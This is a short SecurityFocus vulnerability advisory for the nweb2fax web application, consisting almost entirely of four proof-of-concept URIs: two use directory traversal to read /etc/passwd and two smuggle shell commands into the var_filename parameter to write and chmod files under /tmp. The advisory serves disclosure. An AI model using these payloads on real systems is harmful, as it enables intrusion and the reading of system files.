nweb2fax Multiple Remote Vulnerabilities

Attackers can exploit these issues via a browser.

The following proof-of-concept URIs are available:

http://www.example.com/comm.php?id=../../../../../../../../../../etc/passwd
http://www.example.com/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
http://www.example.com/viewrq.php?format=tif&var_filename=;id%3E/tmp/id.txt;chmod%20777%20/tmp/id.txt;
http://www.example.com/viewrq.php?format=pdf&var_filename=;id%3E/tmp/id2.txt;chmod%20777%20/tmp/id2.txt;id


 

Privacy Statement
Copyright 2010, SecurityFocus